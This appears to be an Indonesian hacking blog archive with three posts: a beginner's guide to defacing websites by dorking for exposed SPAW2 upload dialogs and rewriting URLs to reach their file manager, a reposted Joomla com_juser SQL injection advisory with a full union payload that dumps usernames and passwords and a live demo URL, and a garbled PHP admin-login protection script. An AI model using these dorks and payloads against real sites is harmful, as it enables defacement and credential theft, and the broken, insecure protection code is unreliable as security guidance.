Tampilkan postingan dengan label DDOS. Tampilkan semua postingan
Tampilkan postingan dengan label DDOS. Tampilkan semua postingan

Rabu, 10 Juli 2013

Belajar hacking dari awal :)

08.40  , ,  1 comment

(Pemula)Tutor Lengkap+Gambar Deface Spaw Upload Vulnerably Maaf sebelumnya buat para mimin dan momod
kalau saya repost
dari tutor http://hacker-newbie.org/showthread.php?...light=spaw
Kalau memang tidak berguna silahkan hapus

Menurut saya Threed ini sangat berguna untuk yang benar-benar
pemula seperti saya,,soalnya mengingat beberapa hari lalu ada yang post http://hacker-newbie.org/showthread.php?tid=12893 menanyakan dari mana memulai untuk deface,,disini akan dijelaskan dengan GAMBAR semoga berguna buat yang bener-bener pemula seperti saya

Oke mari dibahas

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”
Lihat gambar


[Image: 30j334i.jpg]

Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

Lihat gambar

[Image: 9u4wup.jpg]

setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

LIHAT GAMBAR

[Image: 2z4a0s3.jpg]
Spoiler Hide
[Image: zv3bjo.jpg]

Tekan Enter
Akan Terbuka Gambar Seperti INI
LIHAT TUTOR DALAM GAMBAR


[Image: 14jqof7.jpg]

Lanjut
lihat terus gambar tutor ada didalam gambar

[Image: 2m6of8l.jpg]

LANJUT
Spoiler Hide
[Image: 2076hw4.jpg]

Lanjut TUTOR ADA DI GAMBAR

[Image: 2884dbc.jpg]

LANJUT

[Image: 34y4ahe.jpg]

SELESAI
Semoga bisa dimengerti

KALAU GAMBAR KURANG JELAS DIREFRESH AJA ATAU BUKA SATU-SATU YAH

SUmber Hn..

Read More

Sabtu, 29 Juni 2013

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection

10.35  , , , ,  No comments 



Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================

etfffffjtiiiiiiiiiiiiii;,;iitfffffffGGDDDDEW#K;.
if E###################################W######Wi 
iE,K##########################################Wi 
iDtW###########WEftt;;ittLGLEEEKW##############j 
iKD#######WEDft,                ;tDW###########f 
iWW####Kfi.        You Gay          iLK########f 
jW###WL                               ,L######Wt 
iW#WL;                        ..        D#####Wi 
iWK,                      tLDDEEj,      ;#####Wi 
f#D                     .G#######Ei      K####E, 
L##        iGDGi.       D#########D.     L####D. 
L##i      tWWWWWL      iKE#########j     i####G. 
tW#i      D#WWKEWj     fDL#########L     .E###L  
iW#j     ;K####W#K;    ;WK######WGKf      G#WWj  
,E#D    .GW#######j     ;L######KGE,     ,E##Wj  
 G#G    .tE#######L   ,Gj,D#####WD;      GWDW#f  
 L#E    ,GK#####KKj  iE#E.,fDEKDj.     ;DWjiWWi  
.G#Wf    ;DW###EED, jW###L    .      .fK#KLfWK;  
,E##Wt     ;fDKKf.  W####Wf         iK#######K;  
iWWL#Ki            ,W#####K,      .f##########f  
;W#;L#WELt,         .ijjji.       f##########Wi  
iWW j#####WDj;,.                 iK##########E.  
;KW,K#########WKDj    ;,      .i.E###########K,  
,ED;W############K;  .DK ;Et  fWtW###########Wi ,
,EL,W#############f  iWG t#f  jWfW###########Wt, 
,Et.E#############L  j#L,L#i  jWfW###########Wj  
,Dj L#############EGDK##LL#f;iDWL############Wj  
,EE.f######################################EEWi  
,EKjf######################################jD#f  
 jWWE#######       [LatinHackTeam]       ##GDWj  
 ,K#################################W######EfWj  
  fEDDEEEEDLLLjtiiiiiiiiiiiitjLLGEEKjK#####WD#G. 
                                  


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Author Name   :  Russell...
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Greetz        :  d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group         :  LatinHackTeam
[+] Vulnerability :  SQL injection 
[+] Google Dork   :  imagine ;)
[+] Email         :  chipdebios[alt+64]gmail.com

###################################################



Example:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
DEMO LIVE:

http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"Ð’©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>

# milw0rm.com [2009-06-01]

Read More

Minggu, 23 Juni 2013

22.14  , , , , ,  No comments


cuman mau mengingatkan
jangan sampe ke asyikan deface web orang lain sampe sampe security web kita gak di perhatikan
mungkin kalaw bug sql or apalah itu tidak ada di web kita
tapi bagaimana jika web 1 hostingan sama kita itu di serang dan melakukan jumping server
maka matilah web kita :-D dia bisa melihat user login mysql kita :-D
ada sedikit cara untuk melindungi nya login admin nya
1.menggunakan managemen protect web yang ada di cpanel pilih lah dir login admin nyalalu seting user & password nya
2.menggunakan ip khusus dalam arti hanya ip kita saja yang bisa masuk ke dir admin
cra nya dengan menggunakan .htaccess


AuthUserFile /dev/null
AuthGroupFile /dev/null 
AuthName “Access Control”
AuthType Basic 
order deny,allow
deny from all 
#IP address to Whitelist
allow from xxx.xxx.xxx.xxx
yang xxx.xxx itu ip kita / yang sering kita gunakan
3. buat lah file dengan nama protext.php / apalah terserah
<?php 


session_start(); 

$admin_user_name = “nama”; 
$admin_password = “password”; 
//you can change the username and password by changing the above two strings 

if (!isset($HTTP_SESSION_VARS['user'])) { 


if(isset($HTTP_POST_VARS['u_name'])) 
$u_name = $HTTP_POST_VARS['u_name']; 


if(isset($HTTP_POST_VARS['u_password'])) 
$u_password = $HTTP_POST_VARS['u_password']; 


if(!isset($u_name)) { 
?> 
<HTML> 
<HEAD> 
<TITLE><?php echo $HTTP_SERVER_VARS['HTTP_HOST']; ?> : Authentication Required</TITLE> 
</HEAD> 
<BODY bgcolor=#ffffff> 
<table border=0 cellspacing=0 cellpadding=0 width=100%> 
<TR><TD> 
<font face=verdana size=2><B>(Access Restricted to Authorized Personnel)</b> </font></td> 
</tr></table> 
<P></P> 
<font face=verdana size=2> 
<center> 
<?php 
$form_to = “http://$HTTP_SERVER_VARS[HTTP_HOST]$HTTP_SERVER_VARS[PHP_SELF]“; 


if(isset($HTTP_SERVER_VARS["QUERY_STRING"])) 
$form_to = $form_to .”?”. $HTTP_SERVER_VARS["QUERY_STRING"]; 


?> 
<form method=post action=<?php echo $form_to; ?>> 
<table border=0 width=350> 
<TR> 
<TD><font face=verdana size=2><B>User Name</B></font></TD> 
<TD><font face=verdana size=2><input type=text name=u_name size=20></font></TD></TR> 
<TR> 
<TD><font face=verdana size=2><B>Password</B></font></TD> 
<TD><font face=verdana size=2><input type=password name=u_password size=20></font></TD> 
</TR> 
</table> 
<input type=submit value=Login></form> 
</center> 
</font> 
</BODY> 
</HTML> 


<?php 
exit; 

else { 


function login_error($host,$php_self) { 
echo “<HTML><HEAD> 
<TITLE>$host : Administration</TITLE> 
</HEAD><BODY bgcolor=#ffffff> 
<table border=0 cellspacing=0 cellpadding=0 width=100%> 
<TR><TD align=left> 
<font face=verdana size=2><B> You Need to log on to access this part of the site! </b> </font></td> 
</tr></table> 
<P></P> 
<font face=verdana size=2> 
<center>”; 


echo “Error: You are not authorized to access this part of the site! 
<B><a href=$php_self>Click here</a></b> to login again.<P> 
</center> 
</font> 
</BODY> 
</HTML>”; 
session_unregister(“adb_password”); 
session_unregister(“user”); 
exit; 



$user_checked_passed = false; 




if(isset($HTTP_SESSION_VARS['adb_password'])) { 


$adb_session_password = $HTTP_SESSION_VARS['adb_password']; 
$adb_session_user = $HTTP_SESSION_VARS['user']; 




if($admin_password != $adb_session_password) 
login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 
else { 
$user_checked_passed = true; 






if($user_checked_passed == false) { 


if(strlen($u_name)< 2) 
login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 


if(isset($admin_password)) { 


if($admin_password == $u_password) { 


session_register(“adb_password”); 
session_register(“user”); 


$adb_password = $admin_password; 
$user = $u_name; 

else { //password in-correct 
login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 


else { 
login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 



$page_location = $HTTP_SERVER_VARS['PHP_SELF']; 
if(isset($HTTP_SERVER_VARS["QUERY_STRING"])) 
$page_location = $page_location .”?”. $HTTP_SERVER_VARS["QUERY_STRING"]; 


header (“Location: “. $page_location); 



?>

4.tinggal masukan ke dir admin di index.php
cara nya include ‘protect.php’;

5.lalu protect.php nya kamu encrypt supaya tidak terbaca :-D

jika menggunakan semua nya berarti security web kamu ada 3 :-D
*1 ip protect jika tembus masih ada 2 lagi :-D
* 2 page password protect ( yang di cpanel ) jika tembus juga masih ada 1 lagi :-D
*3 password protect page jika masih tembus juga ya tinggal menu login admin nya aja hehhehe
tapi kemungkinan besar gak mungkin bisa tembus semua nya

Sumber : http://forum.indonesiansecuritydown.org/thread-1.html

Read More
Langganan: Postingan (Atom)